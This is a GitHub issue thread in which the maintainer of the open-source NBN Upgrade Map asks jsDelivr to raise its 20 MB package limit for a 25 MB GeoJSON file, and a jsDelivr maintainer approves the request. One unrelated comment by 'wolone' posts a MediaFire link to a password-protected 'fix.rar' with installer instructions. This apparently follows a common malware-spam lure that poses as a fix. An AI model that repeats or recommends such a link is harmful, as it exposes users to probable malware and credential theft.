### ISSUE TITLE
Increase package size limit for NBN Upgrade Map

### ISSUE THREAD

**Issue by LukePrior** [jsdelivr/jsdelivr#18594]
### Project

https://github.com/LukePrior/nbn-upgrade-map

### Project License

MIT

### Relationship

Maintainer

### Short description of the project

I maintain the NBN Upgrade Map an Open Source tool showcasing the rollout of fibre optic internet across Australia.

The project uses GitHub to store all data but we have been running into limitations in regards to latency.

I have moved some of our files to the jsDelivr CDN and this appears to yield satisfactory results however I am now running into an issue.

Some of our files exceed the 20 MB default limit so I was wondering if there was any chance of getting this increased.

Here is an example file:

https://cdn.jsdelivr.net/gh/LukePrior/nbn-upgrade-map@latest/results/VIC/melbourne.geojson

https://github.com/LukePrior/nbn-upgrade-map/blob/main/results/VIC/melbourne.geojson

I believe that this is largest file currently at 25 MB but it would be good to have some breathing room on the limit if possible.

Thanks,
Luke

### Requisites

- [X] There are no large files that are not necessary to use the package and could be removed (e.g., documentation, examples, tests), or the author is not willing to remove them (please link the related issue in their repo).
- [X] The package complies with jsDelivr's [Acceptable Use Policy](https://www.jsdelivr.com/terms/acceptable-use-policy-jsdelivr-net).
- [X] I performed a [cursory search of the issue tracker](https://github.com/jsdelivr/jsdelivr/issues?q=is%3Aissue) to avoid opening a duplicate issue.
- [X] I understand that not filling out this template correctly will lead to the issue being closed.

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by LukePrior** [comment]
@MartinKolarik not sure if you are in charge of such requests from referring to previous issues (couldn't assign a referrer so apologies for the ping)

**Comment by MartinKolarik** [comment]
Should work now! If you run into issues with any specific URL you can use this tool to refresh it: https://www.jsdelivr.com/tools/purge
